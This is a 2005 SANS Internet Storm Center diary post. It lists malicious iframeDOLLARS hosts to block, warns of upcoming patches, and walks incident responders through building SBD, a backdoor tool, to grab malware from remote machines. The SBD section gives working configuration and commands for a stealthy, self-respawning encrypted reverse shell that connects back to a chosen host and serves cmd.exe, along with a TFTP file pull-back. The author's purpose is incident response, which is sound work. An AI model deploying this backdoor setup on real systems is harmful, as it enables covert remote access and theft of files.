Threat Level: green Handler on Duty: Pasquale Stirparo

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-06-13 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

iframeDOLLARS.biz redux ; P2P == Prepare to Patch ; I'm the MAP ; Remote Malware Acquisition

Published: 2005-06-13
Last Updated: 2005-06-14 01:12:57 UTC
by William Salusky (Version: 1)
0 comment(s)
I thought a few things were news worthy today, that and after a recent conversation with another Incident Responder interested in improved malware recovery techniques I wanted to share a method that I've been happily using for a while now in performing remote host analysis for the identification and retrieval of malicious code samples.

iframeDOLLARS.biz redux


Holy smokes, the iframeDOLLARS business practice is back up and running at (www.iframedollars.biz) 195.95.218.170 and (bestcounter.biz) 195.95.218.171. We've also received reports of malicious hosting at 195.95.218.172. I personally (NOT SANS!!!) highly recommend these domains and IPs for blackholing on your networks. While you're at it, if you manage large proxies and find new hits for iframeDOLLARS exploits, we'd like to hear about them.

(p2p) It's free, so Prepare to Patch


It's Fr^h^hMonday the 13th, so p2p. I'm not talking about installing spyware and adware riddled software that tempt you to violate multiple laws by gaining access to free warez/music/etc... I'm talking about "p2p" as in "Prepare to Patch". Be forewarned that there are more than a few patches of significance that will become available for an operating system near you starting Tuesday the 14th. Oh yeah, by the way, these patch downloads are also free!

The SANS handlers have received a vendor notice from ISS of a potential incompatibility with specific BlackICE product versions running on Windows 2000 that may conflict with a revision of a Microsoft patch scheduled for release on June 14th. BlackICE users on Windows 2000, Please make sure your engine is running BlackICE PC/Server Protection version "cnr".

The MAP - and this one is not in Dora the Explorer's backpack


The availability of the from iDefense.com was posted in several forums last week. I'm intrigued and will be checking it out soon. Even though I have a strong preference for doing this type of work on a unix platform, based upon a quick read of included tool features there looks to be a few native Windows analysis functions that I wouldn't know how to replicate in the linux world.

Remote Malware Acquisition with SBD


I have an ongoing need to investigate and assist other investigators with remote machines to identify malware as well as retrieve suspicious/obvious samples. I do not often require full GUI console access to get to the root of the problem, so talking someone through the installation of VNC or configuration of terminal services can be a tedious experience. I have found that using SBD which is available from
http://tigerteam.se/dl/sbd/ gave me pretty much all I needed. Just a simple encrypted command line reverse shell delivered to a host of your choosing. SBD, aka ShadowInteger's Backdoor (and no it's not really as evil as it sounds) supports compilation on both unix and win32(cygwin/mingw) environments. Several AntiVirus vendors have started flagging this tool as a PUP - a Potentially Unwanted Program. True Enough, most security tools are double edged swords.



Download the source for yourself. I still use sbd-1.33, it's certainly stable enough for my purposes. A shortcut to creating your custom sbd binary follows:



I recommend making the following modifications to sbd.h header define variables suitable for your environment.

#define HOST "IP.or.host.name" // Your sbd binary will connect back to this.
#define PORT 10001 // The port your binary will attempt to connect.
#define EXECPROG "cmd.exe" // SBD will send you an encrypted shell
#define ENCRYPTION 1 // well, not encrypted if you don't set this variable
#define SHARED_SECRET "Sup3rDup3rp455w0rd" // This is my personal AES shared secret, NOT!
#define RESPAWN_ENABLED 1 // If you accidentally drop the reverse shell
#define RESPAWN_INTERVAL 120 // It will attempt to reconnect in 2 hours.
#define QUIET 1
#define VERBOSE 0
#define DAEMONIZE 1


To build your Windows binary, execute the following from a Cygwin Bash shell

$ make win32bg CFLAGS=-DSTEALTH

If all goes well your new SBD binary is now hardcoded to perform a specific action by default which is to connect back to your host and present you with a cmd.exe shell.



To receive a connection from a suspect host, make sure you're running an appropriately configured sbd binary. The same binary can be used as sending client or receiving server.


On my linux host using a linux SBD binary of course, I first start a typescripting session so that I will have a log of everything I've done remotely, then I execute the following:

sbd -k Sup3rDup3rp455w0rd -l -p 10001 -r 0

Once you have your sbd listener waiting you can provide phone/email/IM/pager instructions to your remote workstation user to grab and execute your custom sbd binary. The remote user should not have to provide any fancy command line arguments, and while it's bad security form they can even execute directly from your webpage. I leave a web server and tftp server available for tool retrieval and tftp uploads enabled so I can push malware samples back to myself.


Once the remote user executes your custom SBD binary you should have a command shell appear in the window you just executed your sbd listener in. Yay, let the healing begin.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\

At this point your creativity as an Incident Responder is the only limit.

TFTP retrieval of tools.

Directory listings in reverse order 'dir /od'

Hidden file listings 'dir /od /ah'

Registry run key listing using 'reg' (XP)

TFTP upload of malicious samples.
To bring this diary to a close, I leave it as a challenge for another handler to present you with an IR SBD based methodology that utilizes only the tools available to the default unmodified native operating system vs. a methodology that leverages the retrieval of supporting analysis tools. If the challenge is not accepted, I'll share my process.



Build it. Use it. Finally, Let us know how you use it.


Thanks, and we'll leave the light on.

William Salusky
wsalusky at gmail dot com
Handler on Duty (heh heh, Duty)
Keywords:
0 comment(s)
Diary Archives